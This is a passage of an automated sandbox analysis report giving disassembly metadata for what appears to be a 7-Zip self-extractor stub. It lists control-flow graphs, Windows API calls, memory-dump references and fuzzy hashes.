                                                                      • Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                      • Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9

                                                                      Control-flow Graph: function at 004036F1
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                        • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                        • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                      • memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                      • String ID:
                                                                      • API String ID: 846840743-0
                                                                      • Opcode ID: 56e83d9032eb4557e1cbfa7845c089d1cc7cb79c4288f6695d96d71fac981e1d
                                                                      • Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
                                                                      • Opcode Fuzzy Hash: 56e83d9032eb4557e1cbfa7845c089d1cc7cb79c4288f6695d96d71fac981e1d
                                                                      • Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD

                                                                      Control-flow Graph: function at 0040F227
                                                                      APIs
                                                                      • _EH_prolog.MSVCRT ref: 0040F230
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1
                                                                        • Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@$H_prolog
                                                                      • String ID: pmA${D@
                                                                      • API String ID: 3431946709-901781089
                                                                      • Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                      • Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
                                                                      • Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                      • Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54

                                                                      Control-flow Graph

                                                                      control_flow_graph 1041 401b75-401b84 CreateDirectoryW 1042 401bb6-401bba 1041->1042 1043 401b86-401b93 GetLastError 1041->1043 1044 401ba0-401bad GetFileAttributesW 1043->1044 1045 401b95 1043->1045 1044->1042 1047 401baf-401bb1 1044->1047 1046 401b96-401b9f SetLastError 1045->1046 1047->1042 1048 401bb3-401bb4 1047->1048 1048->1046
                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
                                                                      • GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
                                                                      • SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                      • String ID: k7@
                                                                      • API String ID: 635176117-1561861239
                                                                      • Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                      • Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
                                                                      • Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                      • Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549

                                                                      Control-flow Graph

                                                                      control_flow_graph 1052 40e9ef-40ea0a call 410a40 1055 40ea19-40ea52 call 406eb0 call 40f707 1052->1055 1056 40ea0c-40ea16 1052->1056 1061 40eb20-40eb46 call 40e79c call 40e6d7 1055->1061 1062 40ea58-40ea62 ??2@YAPAXI@Z 1055->1062 1074 40eb64-40eb7c call 40cdda call 401132 1061->1074 1075 40eb48-40eb5e call 40e2e8 1061->1075 1064 40ea71 1062->1064 1065 40ea64-40ea6f 1062->1065 1066 40ea73-40eaac call 40ef4a ??2@YAPAXI@Z 1064->1066 1065->1066 1072 40eabe 1066->1072 1073 40eaae-40eabc 1066->1073 1076 40eac0-40eaf9 call 40ef4a call 40c350 call 40e45f 1072->1076 1073->1076 1089 40ebb4-40ebc4 1074->1089 1090 40eb7e-40eb8b ??2@YAPAXI@Z 1074->1090 1075->1074 1083 40ece0-40ecf7 1075->1083 1105 40eb01-40eb06 1076->1105 1106 40eafb-40eafd 1076->1106 1094 40ee93-40eeae call 40e27a 1083->1094 1095 40ecfd 1083->1095 1107 40ebf4-40ebfa 1089->1107 1108 40ebc6 1089->1108 1091 40eb96 1090->1091 1092 40eb8d-40eb94 call 40e7c1 1090->1092 1097 40eb98-40eba8 call 40f707 1091->1097 1092->1097 1111 40eeb0-40eeb6 1094->1111 1112 40eeb9-40eebc 1094->1112 1101 40ed00-40ed30 1095->1101 1120 40ebaa-40ebad 1097->1120 1121 40ebaf 1097->1121 1118 40ed60-40eda6 call 40cd11 * 2 1101->1118 1119 40ed32-40ed38 1101->1119 1116 40eb08-40eb0a 1105->1116 1117 40eb0e-40eb1a 1105->1117 1106->1105 1113 40ec00-40ec20 call 40cf2f 1107->1113 1114 40ecce-40ecdd call 40e977 1107->1114 1115 40ebc8-40ebee call 40ce5c call 40e2c5 call 40e42c call 40e4dd 1108->1115 1111->1112 1112->1115 1123 40eec2-40eee9 call 40cd11 1112->1123 1133 40ec25-40ec2d 1113->1133 1114->1083 1115->1107 1116->1117 1117->1061 1117->1062 1163 40ee10 1118->1163 1164 40eda8-40edab 1118->1164 1127 40ee00-40ee02 1119->1127 1128 40ed3e-40ed50 1119->1128 1129 40ebb1 1120->1129 1121->1129 1145 40ef01-40ef1d 1123->1145 1146 40eeeb-40eeff call 4107a2 1123->1146 1139 40ee06-40ee0b 1127->1139 1150 40ed56-40ed58 1128->1150 1151 40edda-40eddc 1128->1151 1129->1089 1137 40ec33-40ec3a 
1133->1137 1138 40edca-40edcf 1133->1138 1147 40ec68-40ec6b 1137->1147 1148 40ec3c-40ec40 1137->1148 1141 40edd1-40edd3 1138->1141 1142 40edd7 1138->1142 1139->1115 1141->1142 1142->1151 1217 40ef1e call 40bb40 1145->1217 1218 40ef1e call 40c5e0 1145->1218 1219 40ef1e call 40e17a 1145->1219 1220 40ef1e call 41297c 1145->1220 1146->1145 1152 40ec71-40ec7f call 40f707 1147->1152 1153 40edf9-40edfe 1147->1153 1148->1147 1156 40ec42-40ec45 1148->1156 1150->1118 1159 40ed5a-40ed5c 1150->1159 1160 40ede4-40ede7 1151->1160 1161 40edde-40ede0 1151->1161 1180 40ec81-40ec87 call 413226 1152->1180 1181 40ec8c-40ec9d call 40e45f 1152->1181 1153->1127 1153->1139 1166 40ec4b-40ec59 call 40f707 1156->1166 1167 40edec-40edf1 1156->1167 1157 40ef21-40ef2b call 40ce5c 1157->1115 1159->1118 1160->1115 1161->1160 1169 40ee13-40ee19 1163->1169 1174 40edae-40edc6 call 4107a2 1164->1174 1166->1181 1184 40ec5b-40ec66 call 413201 1166->1184 1167->1139 1173 40edf3-40edf5 1167->1173 1176 40ee64-40ee8d call 40ce5c * 2 1169->1176 1177 40ee1b-40ee27 call 40e558 1169->1177 1173->1153 1189 40edc8 1174->1189 1176->1094 1176->1101 1195 40ee35-40ee41 call 40e5a3 1177->1195 1196 40ee29-40ee33 1177->1196 1180->1181 1197 40eca5-40ecaa 1181->1197 1198 40ec9f-40eca1 1181->1198 1184->1181 1189->1169 1210 40ef30-40ef45 call 40ce5c * 2 1195->1210 1211 40ee47 1195->1211 1202 40ee4a-40ee62 call 4107a2 1196->1202 1199 40ecb2-40ecb7 1197->1199 1200 40ecac-40ecae 1197->1200 1198->1197 1205 40ecb9-40ecbb 1199->1205 1206 40ecbf-40ecc8 1199->1206 1200->1199 1202->1176 1202->1177 1205->1206 1206->1113 1206->1114 1210->1115 1211->1202 1217->1157 1218->1157 1219->1157 1220->1157
                                                                      APIs
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@
                                                                      • String ID: DmA${D@
                                                                      • API String ID: 1033339047-1777112864
                                                                      • Opcode ID: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                      • Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
                                                                      • Opcode Fuzzy Hash: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                      • Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84

                                                                      Control-flow Graph

                                                                      control_flow_graph 1221 410ccb-410ce8 call 40e0d0 1224 410e20-410e23 1221->1224 1225 410cee-410cf5 call 41076b 1221->1225 1228 410cf7-410cf9 1225->1228 1229 410cfe-410d2d call 40e036 memcpy 1225->1229 1228->1224 1232 410d30-410d38 1229->1232 1233 410d50-410d68 1232->1233 1234 410d3a-410d48 1232->1234 1240 410d6a-410d6f 1233->1240 1241 410dcf 1233->1241 1235 410dc4-410dcd ??3@YAXPAX@Z 1234->1235 1236 410d4a 1234->1236 1238 410e1e-410e1f 1235->1238 1236->1233 1237 410d4c-410d4e 1236->1237 1237->1233 1237->1235 1238->1224 1243 410d71-410d79 1240->1243 1244 410dd4-410dd7 1240->1244 1242 410dd1-410dd2 1241->1242 1245 410e17-410e1c ??3@YAXPAX@Z 1242->1245 1246 410d7b 1243->1246 1247 410dad-410dbf memmove 1243->1247 1244->1242 1245->1238 1248 410d8a-410d8e 1246->1248 1247->1232 1249 410d90-410d92 1248->1249 1250 410d82-410d84 1248->1250 1249->1247 1252 410d94-410d9d call 41076b 1249->1252 1250->1247 1251 410d86-410d87 1250->1251 1251->1248 1255 410dd9-410e0f memcpy call 40d041 1252->1255 1256 410d9f-410dab 1252->1256 1258 410e12-410e15 1255->1258 1256->1247 1257 410d7d-410d80 1256->1257 1257->1248 1258->1245
                                                                      APIs
                                                                      • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
                                                                      • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@memcpymemmove
                                                                      • String ID:
                                                                      • API String ID: 3549172513-0
                                                                      • Opcode ID: 68ec5b1761c5ee7f9fc326a7c1c6742ca84d938ae768d4aa852de07e3c909998
                                                                      • Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
                                                                      • Opcode Fuzzy Hash: 68ec5b1761c5ee7f9fc326a7c1c6742ca84d938ae768d4aa852de07e3c909998
                                                                      • Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59

                                                                      Control-flow Graph

                                                                      control_flow_graph 1273 404903-404984 #17 call 413370 call 402131 call 402187 * 7 1292 404989-40499d SHGetSpecialFolderPathW 1273->1292 1293 404a32-404a36 1292->1293 1294 4049a3-4049ed wsprintfW call 401458 * 2 call 401370 * 2 call 4032d9 1292->1294 1293->1292 1295 404a3c-404a40 1293->1295 1305 4049f2-4049f8 1294->1305 1306 404a22-404a28 1305->1306 1307 4049fa-404a1d call 401370 * 2 call 4032d9 1305->1307 1306->1305 1309 404a2a-404a2d call 40269a 1306->1309 1307->1306 1309->1293
                                                                      APIs
                                                                      • #17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F
                                                                        • Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B
                                                                        • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                        • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                        • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                        • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                        • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                        • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                        • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                        • Part of subcall function 00402187: lstrcmpiW.KERNEL32(02533FD0,00404926), ref: 0040224B
                                                                        • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(02533FD0), ref: 0040225B
                                                                        • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                        • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                        • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                        • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                        • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                        • Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
                                                                        • Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,02533FD0,00000002), ref: 00402334
                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
                                                                      • wsprintfW.USER32 ref: 004049B0
                                                                        • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                      • String ID: 7zSfxFolder%02d
                                                                      • API String ID: 3387708999-2820892521
                                                                      • Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                      • Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
                                                                      • Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                      • Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58

                                                                      Control-flow Graph

                                                                      control_flow_graph 1315 402bee-402c38 call 413660 call 40d041 lstrlenA * 2 1319 402c3d-402c59 call 40d00d 1315->1319 1321 402d29 1319->1321 1322 402c5f-402c64 1319->1322 1323 402d2b-402d2f 1321->1323 1322->1321 1324 402c6a-402c74 1322->1324 1325 402c77-402c7c 1324->1325 1326 402cbb-402cc0 1325->1326 1327 402c7e-402c83 1325->1327 1328 402ce5-402d09 memmove 1326->1328 1330 402cc2-402cd5 memcmp 1326->1330 1327->1328 1329 402c85-402c98 memcmp 1327->1329 1335 402d18-402d23 1328->1335 1336 402d0b-402d12 1328->1336 1331 402d25-402d27 1329->1331 1332 402c9e-402ca8 1329->1332 1333 402cb5-402cb9 1330->1333 1334 402cd7-402ce3 1330->1334 1331->1323 1332->1321 1337 402caa-402cb0 call 40292b 1332->1337 1333->1325 1334->1325 1335->1323 1336->1335 1338 402c3a 1336->1338 1337->1333 1338->1319
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
                                                                      • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
                                                                      • memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
                                                                      • memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
                                                                      • memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlenmemcmp$memmove
                                                                      • String ID:
                                                                      • API String ID: 3251180759-0
                                                                      • Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                      • Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
                                                                      • Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                      • Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55

                                                                      Control-flow Graph

                                                                      control_flow_graph 1342 401611-401667 call 40f707 call 401370 call 401526 CreateThread 1349 401669 call 40851f 1342->1349 1350 40166e-401689 WaitForSingleObject 1342->1350 1349->1350 1352 40168b-40168e 1350->1352 1353 4016bd-4016c3 1350->1353 1356 401690-401693 1352->1356 1357 4016b1 1352->1357 1354 401721 1353->1354 1355 4016c5-4016da GetExitCodeThread 1353->1355 1363 401726-401729 1354->1363 1358 4016e4-4016ef 1355->1358 1359 4016dc-4016de 1355->1359 1360 401695-401698 1356->1360 1361 4016ad-4016af 1356->1361 1362 4016b3-4016bb call 408dbf 1357->1362 1365 4016f1-4016f2 1358->1365 1366 4016f7-401700 1358->1366 1359->1358 1364 4016e0-4016e2 1359->1364 1367 4016a9-4016ab 1360->1367 1368 40169a-40169d 1360->1368 1361->1362 1362->1354 1364->1363 1370 4016f4-4016f5 1365->1370 1371 401702-401709 1366->1371 1372 40170b-401717 SetLastError 1366->1372 1367->1362 1373 4016a4-4016a7 1368->1373 1374 40169f-4016a2 1368->1374 1376 401719-40171e call 408dbf 1370->1376 1371->1354 1371->1372 1372->1376 1373->1370 1374->1354 1374->1373 1376->1354
                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
                                                                      • WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676
                                                                        • Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                        • Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
                                                                        • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                        • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                        • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
                                                                        • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                        • Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                        • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                        • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                        • Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                        • Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                      • String ID:
                                                                      • API String ID: 359084233-0
                                                                      • Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                      • Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
                                                                      • Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                      • Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E

Control-flow Graph
control_flow_graph 1379 404545-404576 call 401458 call 4027aa GetTempPathW 1384 404598-4045a5 1379->1384 1385 404578-404595 call 4027aa GetTempPathW call 40115e 1379->1385 1387 4045a8-4045df call 4027aa wsprintfW call 40115e GetFileAttributesW 1384->1387 1385->1384 1395 4045e1-4045eb 1387->1395 1396 4045ed-4045f3 1387->1396 1395->1387 1395->1396
APIs
• GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
• GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
• wsprintfW.USER32 ref: 004045BB
• GetFileAttributesW.KERNELBASE(?), ref: 004045D6
Similarity
• API ID: PathTemp$AttributesFilewsprintf
• String ID:
• API String ID: 1746483863-0
• Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
• Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
• Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
• Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94

Control-flow Graph
control_flow_graph 1397 412525-412563 call 40fc0a 1400 412565 call 4105e9 1397->1400 1401 41256a-412598 call 413350 1397->1401 1400->1401 1401->1400 1405 41259a-4125b9 1401->1405 1406 4127a3-4127a7 1405->1406 1407 4125bf-4125c1 1405->1407 1408 4125c3-4125c7 1407->1408 1409 4125c9-4125cc 1407->1409 1408->1409 1410 4125d1-4125d4 1408->1410 1409->1406 1411 4125d6 1410->1411 1412 4125dd-4125ee 1410->1412 1411->1409 1413 4125d8-4125db 1411->1413 1414 4125f0 1412->1414 1415 4125f7-412606 call 40d041 1412->1415 1413->1409 1413->1412 1414->1409 1416 4125f2-4125f5 1414->1416 1417 412609-41260b 1415->1417 1416->1409 1416->1415 1417->1406 1418 412611-41263c call 40e036 call 40e0d0 1417->1418 1423 41264f-412687 call 413350 1418->1423 1424 41263e 1418->1424 1423->1400 1429 41268d-4126c2 call 411603 call 410684 1423->1429 1425 412640-41264a ??3@YAXPAX@Z 1424->1425 1427 4127a2 1425->1427 1427->1406 1434 4126c4-4126c6 1429->1434 1435 4126cc-4126cf 1429->1435 1434->1435 1436 41276c-4127a0 call 411f01 call 410996 call 4115ca ??3@YAXPAX@Z 1434->1436 1435->1400 1437 4126d5-4126d7 1435->1437 1436->1427 1437->1400 1439 4126dd-4126ff call 411c05 1437->1439 1444 412701-412711 call 410996 call 4115ca 1439->1444 1445 412716-41271a 1439->1445 1444->1425 1448 412733-412737 1445->1448 1449 41271c-41272e call 410996 call 4115ca 1445->1449 1448->1400 1454 41273d-41275e call 4115ca call 411603 call 410684 1448->1454 